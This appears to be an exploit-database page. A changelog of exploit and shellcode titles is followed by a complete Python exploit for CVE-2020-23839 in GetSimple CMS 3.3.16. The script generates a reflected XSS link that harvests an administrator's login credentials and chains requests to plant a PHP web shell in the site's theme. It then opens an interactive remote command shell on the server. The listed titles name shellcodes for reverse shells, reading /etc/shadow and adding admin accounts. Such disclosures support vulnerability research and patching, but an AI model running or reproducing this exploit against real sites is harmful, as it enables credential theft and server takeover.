de260aeac6
95 changes to exploits/shellcodes Product Key Explorer 4.2.7 - 'multiple' Denial of Service (PoC) Managed Switch Port Mapping Tool 2.85.2 - Denial of Service (PoC) AgataSoft PingMaster Pro 2.1 - Denial of Service (PoC) Nsauditor 3.2.2.0 - 'Event Description' Denial of Service (PoC) WordPress Plugin WPGraphQL 1.3.5 - Denial of Service Sandboxie 5.49.7 - Denial of Service (PoC) WebSSH for iOS 14.16.10 - 'mashREPL' Denial of Service (PoC) iDailyDiary 4.30 - Denial of Service (PoC) RarmaRadio 2.72.8 - Denial of Service (PoC) DupTerminator 1.4.5639.37199 - Denial of Service (PoC) Color Notes 1.4 - Denial of Service (PoC) Macaron Notes great notebook 5.5 - Denial of Service (PoC) My Notes Safe 5.3 - Denial of Service (PoC) n+otes 1.6.2 - Denial of Service (PoC) Telegram Desktop 2.9.2 - Denial of Service (PoC) Mini-XML 3.2 - Heap Overflow Solaris 10 (Intel) - 'dtprintinfo' Local Privilege Escalation (2) Solaris 10 (Intel) - 'dtprintinfo' Local Privilege Escalation (3) Solaris 10 (SPARC) - 'dtprintinfo' Local Privilege Escalation (1) Solaris 10 (SPARC) - 'dtprintinfo' Local Privilege Escalation (2) MariaDB 10.2 - 'wsrep_provider' OS Command Execution Microsoft Internet Explorer 11 and WPAD service 'Jscript.dll' - Use-After-Free Visual Studio Code 1.47.1 - Denial of Service (PoC) DELL dbutil_2_3.sys 2.3 - Arbitrary Write to Local Privilege Escalation (LPE) MySQL User-Defined (Linux) x32 / x86_64 - 'sys_exec' Local Privilege Escalation (2) Cmder Console Emulator 1.3.18 - 'Cmder.exe' Denial of Service (PoC) GNU Wget < 1.18 - Arbitrary File Upload (2) WebCTRL OEM 6.5 - 'locale' Reflected Cross-Site Scripting (XSS) E-Learning System 1.0 - Authentication Bypass PEEL Shopping 9.3.0 - 'Comments' Persistent Cross-Site Scripting GetSimple CMS 3.3.16 - Persistent Cross-Site Scripting EgavilanMedia User Registration & Login System with Admin Panel 1.0 - Persistent Cross-Site Scripting Selea Targa 512 IP OCR-ANPR Camera - Stream Disclosure (Unauthenticated) Library System 1.0 - Authentication Bypass Web Based Quiz System 1.0 - 'name' Persistent Cross-Site Scripting Dolibarr ERP 11.0.4 - File Upload Restrictions Bypass (Authenticated RCE) GetSimple CMS My SMTP Contact Plugin 1.1.1 - Cross-Site Request Forgery GravCMS 1.10.7 - Unauthenticated Arbitrary File Write (Metasploit) Umbraco v8.14.1 - 'baseUrl' SSRF Cacti 1.2.12 - 'filter' SQL Injection GetSimple CMS Custom JS 0.1 - Cross-Site Request Forgery Internship Portal Management System 1.0 - Remote Code Execution(Unauthenticated) Markdown Explorer 0.1.1 - Persistent Cross-Site Scripting Xmind 2020 - Persistent Cross-Site Scripting Tagstoo 2.0.1 - Persistent Cross-Site Scripting SnipCommand 0.1.0 - Persistent Cross-Site Scripting Moeditor 0.2.0 - Persistent Cross-Site Scripting Marky 0.0.1 - Persistent Cross-Site Scripting StudyMD 0.3.2 - Persistent Cross-Site Scripting Freeter 1.2.1 - Persistent Cross-Site Scripting Markright 1.0 - Persistent Cross-Site Scripting Markdownify 1.2.0 - Persistent Cross-Site Scripting Anote 1.0 - Persistent Cross-Site Scripting Subrion CMS 4.2.1 - Arbitrary File Upload Printable Staff ID Card Creator System 1.0 - 'email' SQL Injection Schlix CMS 2.2.6-6 - Arbitary File Upload (Authenticated) Selenium 3.141.59 - Remote Code Execution (Firefox/geckodriver) CHIYU IoT Devices - Denial of Service (DoS) Zenario CMS 8.8.52729 - 'cID' SQL injection (Authenticated) TextPattern CMS 4.8.7 - Remote Command Execution (Authenticated) WordPress Plugin Anti-Malware Security and Bruteforce Firewall 4.20.59 - Directory Traversal Atlassian Jira Server Data Center 8.16.0 - Reflected Cross-Site Scripting (XSS) Scratch Desktop 3.17 - Remote Code Execution Church Management System 1.0 - Arbitrary File Upload (Authenticated) Phone Shop Sales Managements System 1.0 - Arbitrary File Upload Zoo Management System 1.0 - 'Multiple' Persistent Cross-Site-Scripting (XSS) WordPress Plugin Current Book 1.0.1 - 'Book Title' Persistent Cross-Site Scripting ForgeRock Access Manager 14.6.3 - Remote Code Execution (RCE) (Unauthenticated) KevinLAB BEMS 1.0 - Authentication Bypass Event Registration System with QR Code 1.0 - Authentication Bypass CloverDX 5.9.0 - Cross-Site Request Forgery (CSRF) Panasonic Sanyo CCTV Network Camera 2.03-0x - Cross-Site Request Forgery (Change Password) qdPM 9.2 - Password Exposure (Unauthenticated) ApacheOfBiz 17.12.01 - Remote Command Execution (RCE) Movable Type 7 r.5002 - XMLRPC API OS Command Injection (Metasploit) GeoVision Geowebserver 5.3.3 - Local FIle Inclusion Simple Phone Book 1.0 - 'Username' SQL Injection (Unauthenticated) Umbraco CMS 8.9.1 - Directory Traversal Traffic Offense Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated) Dolibarr ERP 14.0.1 - Privilege Escalation Compro Technology IP Camera - 'killps.cgi' Denial of Service (DoS) Drupal Module MiniorangeSAML 8.x-2.22 - Privilege escalation Phpwcms 1.9.30 - Arbitrary File Upload Windows/x86 - Download File (http://10.10.10.5:8080/2NWyfQ9T.hta) Via mshta + Execute + Stager Shellcode (143 bytes) Linux/x64 - Bind_tcp (0.0.0.0:4444) + Password (12345678) + Shell (/bin/sh) Shellcode (142 bytes) Linux/x64 - execve _cat /etc/shadow_ Shellcode (66 bytes) Windows/x86 - Add User Alfred to Administrators/Remote Desktop Users Group Shellcode (240 bytes) Windows/x64 - Dynamic Null-Free WinExec PopCalc Shellcode (205 Bytes) Windows/x64 - Dynamic NoNull Add RDP Admin (BOKU:SP3C1ALM0V3) Shellcode (387 Bytes) Linux/x86 - setreuid(0) + execve(_/bin/sh_) Shellcode (29 bytes) Linux/x86 - Bind (User Specified Port) Shell (/bin/sh) Shellcode (102 bytes) Linux/x86 - Reverse (dynamic IP and port/TCP) Shell (/bin/sh) Shellcode (86 bytes) Linux/x86 - Egghunter Reverse TCP Shell dynamic IP and port Shellcode Windows/x86 - WinExec PopCalc PEB & Export Directory Table NullFree Dynamic Shellcode (178 bytes) Windows/x86 - MessageBoxA PEB & Export Address Table NullFree/Dynamic Shellcode (230 bytes)
125 lines
No EOL
7.1 KiB
Python
Executable file
125 lines
No EOL
7.1 KiB
Python
Executable file
# Exploit Title: GetSimple CMS 3.3.16 - Reflected XSS to RCE
|
|
# Exploit Author: Bobby Cooke (boku)
|
|
# Discovery Credits: Bobby Cooke (boku) & Adeeb Shah (@hyd3sec)
|
|
# Date: March 29th, 2021
|
|
# CVE ID: CVE-2020-23839 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-23839
|
|
# Vendor Homepage: http://get-simple.info
|
|
# Software Link: http://get-simple.info/download/
|
|
# Version: v3.3.16
|
|
# Tested against Server Host: Windows 10 Pro + XAMPP
|
|
# Tested against Client Browsers: Firefox(Linux), Chrome (Linux & Windows), Edge
|
|
# Full Disclosure & Information at: https://github.com/boku7/CVE-2020-23839
|
|
|
|
# Vulnerability Description:
|
|
# GetSimple CMS v3.3.16 suffers from a Reflected XSS on the Admin Login Portal. On August 12th, 2020, the vendor received full disclosure details of the vulnerability via private email. The vulnerability was publicly disclosed on September 13th, 2020 # via MITRE with the publication of CVE-2020-23839, which contained little details and no proof of concept. On January 20th, 2021 full disclosure and code analysis was publicly disclosed under the GetSimple CMS GitHub active issues ticket.
|
|
# Exploit Description:
|
|
# This exploit creates a Reflected XSS payload, in the form of a hyperlink, which exploit CVE-2020-23839. When an Administrator of the GetSimple CMS system goes to this URL in their browser and enters their credentials, a sophisticated exploitation # attack-chain will be launched, which will allow the remote attacker to gain Remote Code Execution of the server that hosts the GetSimple CMS system.
|
|
# Attack Chain:
|
|
# 1. Attacker tricks GetSimple CMS Admin to go to the URL provided from this exploit
|
|
# 2. Admin then enters their credentials into the GetSimple CMS login portal
|
|
# 3. Reflected XSS Payload triggers onAction when the Admin clicks the Submit button or presses Enter
|
|
# 4. The XSS payload performs an XHR POST request in the background, which logs the browser into the GetSimple CMS Admin panel
|
|
# 5. The XSS payload then performs a 2nd XHR GET request to admin/edit-theme.php, and collects the CSRF Token & Configured theme for the webpages hosted on the CMS
|
|
# 6. The XSS payload then performs a 3rd XHR POST request to admin/edit-theme.php, which injects a PHP backdoor WebShell to all pages of the CMS
|
|
# 7. The exploit repeatedly attempts to connect to the public /index.php page of the target GetSimple CMS system until a WebShell is returned
|
|
# 8. When the exploit hooks to the WebShell, an interactive PHP WebShell appears in the attackers console
|
|
|
|
import sys,re,argparse,requests
|
|
from urllib.parse import quote
|
|
from colorama import (Fore as F, Back as B, Style as S)
|
|
from time import sleep
|
|
|
|
FT,FR,FG,FY,FB,FM,FC,ST,SD,SB = F.RESET,F.RED,F.GREEN,F.YELLOW,F.BLUE,F.MAGENTA,F.CYAN,S.RESET_ALL,S.DIM,S.BRIGHT
|
|
def bullet(char,color):
|
|
C=FB if color == 'B' else FR if color == 'R' else FG
|
|
return SB+FB+'['+ST+SB+char+SB+FB+']'+ST+' '
|
|
info,err,ok = bullet('-','B'),bullet('-','R'),bullet('+','G')
|
|
|
|
def webshell(SERVER_URL):
|
|
try:
|
|
WEB_SHELL = SERVER_URL
|
|
getdir = {'FierceGodKick': 'echo %CD%'}
|
|
r = requests.post(url=WEB_SHELL, data=getdir, verify=False)
|
|
status = r.status_code
|
|
cwd = re.findall(r'[CDEF].*', r.text)
|
|
if cwd:
|
|
cwd = cwd[0]+"> "
|
|
term = SB+FG+cwd+FT
|
|
print(SD+FR+')'+FY+'+++++'+FR+'['+FT+'=========>'+ST+SB+' WELCOME BOKU '+ST+SD+'<========'+FR+']'+FY+'+++++'+FR+'('+FT+ST)
|
|
while True:
|
|
thought = input(term)
|
|
command = {'FierceGodKick': thought}
|
|
r = requests.post(WEB_SHELL, data=command, verify=False)
|
|
status = r.status_code
|
|
if status != 200:
|
|
r.raise_for_status()
|
|
response = r.text
|
|
print(response)
|
|
else:
|
|
r.raise_for_status()
|
|
except:
|
|
pass
|
|
|
|
def urlEncode(javascript):
|
|
return quote(javascript)
|
|
|
|
def genXssPayload():
|
|
XSS_PAYLOAD = '/index/javascript:'
|
|
XSS_PAYLOAD += 'var s = decodeURIComponent("%2f");'
|
|
XSS_PAYLOAD += 'var h = "application"+s+"x-www-form-urlencoded";'
|
|
XSS_PAYLOAD += 'var e=function(i){return encodeURIComponent(i);};'
|
|
XSS_PAYLOAD += 'var user = document.forms[0][0].value;'
|
|
XSS_PAYLOAD += 'var pass = document.forms[0][1].value;'
|
|
XSS_PAYLOAD += 'var u1 = s+"admin"+s;'
|
|
XSS_PAYLOAD += 'var u2 = u1+"theme-edit.php";'
|
|
XSS_PAYLOAD += 'var xhr1 = new XMLHttpRequest();'
|
|
XSS_PAYLOAD += 'var xhr2 = new XMLHttpRequest();'
|
|
XSS_PAYLOAD += 'var xhr3 = new XMLHttpRequest();'
|
|
XSS_PAYLOAD += 'xhr1.open("POST",u1,true);'
|
|
XSS_PAYLOAD += 'xhr1.setRequestHeader("Content-Type", h);'
|
|
XSS_PAYLOAD += 'params = "userid="+user+"&pwd="+pass+"&submitted=Login";'
|
|
XSS_PAYLOAD += 'xhr1.onreadystatechange = function(){'
|
|
XSS_PAYLOAD += 'if (xhr1.readyState == 4 && xhr1.status == 200) {'
|
|
XSS_PAYLOAD += 'xhr2.onreadystatechange = function(){'
|
|
XSS_PAYLOAD += 'if (xhr2.readyState == 4 && xhr2.status == 200) {'
|
|
XSS_PAYLOAD += 'r=this.responseXML;'
|
|
XSS_PAYLOAD += 'nVal = r.querySelector("#nonce").value;'
|
|
XSS_PAYLOAD += 'eVal = r.forms[1][2].defaultValue;'
|
|
XSS_PAYLOAD += 'xhr3.open("POST",u2,true);'
|
|
XSS_PAYLOAD += 'xhr3.setRequestHeader("Content-Type", h);'
|
|
XSS_PAYLOAD += 'payload=e("<?php echo shell_exec($_REQUEST[FierceGodKick]) ?>");'
|
|
XSS_PAYLOAD += 'params="nonce="+nVal+"&content="+payload+"&edited_file="+eVal+"&submitsave=Save+Changes";'
|
|
XSS_PAYLOAD += 'xhr3.send(params);'
|
|
XSS_PAYLOAD += '}};'
|
|
XSS_PAYLOAD += 'xhr2.open("GET",u2,true);'
|
|
XSS_PAYLOAD += 'xhr2.responseType="document";'
|
|
XSS_PAYLOAD += 'xhr2.send();'
|
|
XSS_PAYLOAD += '}};'
|
|
XSS_PAYLOAD += 'xhr1.send(params);'
|
|
XSS_PAYLOAD += '%2f%2f'
|
|
return XSS_PAYLOAD
|
|
|
|
def argsetup():
|
|
about = SB+FT+'This exploit creates a Reflected XSS payload, in the form of a hyperlink, which exploit CVE-2020-23839. When an Administrator of the GetSimple CMS system goes to this URL in their browser and enters their credentials, a sophisticated exploitation attack-chain will be launched, which will allow the remote attacker to gain Remote Code Execution of the server that hosts the GetSimple CMS system.'+ST
|
|
parser = argparse.ArgumentParser(description=about)
|
|
parser.add_argument('TargetSite',type=str,help='The routable domain name of the target site')
|
|
args = parser.parse_args()
|
|
return args
|
|
|
|
if __name__ == "__main__":
|
|
print(SB+FB+'Exploit Author'+FT+': '+FB+'Bobby Cooke'+FT+FB)
|
|
print(SB+FR+' CVE-2020-23839 '+FT+'|'+FR+' GetSimpleCMS v3.3.16 '+FT)
|
|
print(FR+'Reflected XSS '+FT+'->'+FR+' CredHarvest Payload '+FT+'->'+FR+' XHR Chaining '+FT+'->'+FR+' RCE'+ST)
|
|
args = argsetup()
|
|
RHOST = args.TargetSite
|
|
WEBAPP_URL = RHOST+'/admin/'
|
|
WEBAPP_URL = WEBAPP_URL+'index.php'
|
|
PAYLOAD = genXssPayload()
|
|
ENCODED_PAYLOAD = urlEncode(PAYLOAD)
|
|
print(info+FT+'Have a '+SB+FB+'GetSimpleCMS '+SB+FC+'Admin '+ST+'go to this '+SB+FM+'URL & login'+ST+', and you will get an '+SB+FR+'RCE WebShell'+ST)
|
|
print(SB+FB+WEBAPP_URL+ENCODED_PAYLOAD+ST)
|
|
sleep(1)
|
|
print(ok+'Waiting for Admin to login with creds, which will trigger the RCE XHR attack chain..')
|
|
while True:
|
|
sleep(1)
|
|
webshell(RHOST) |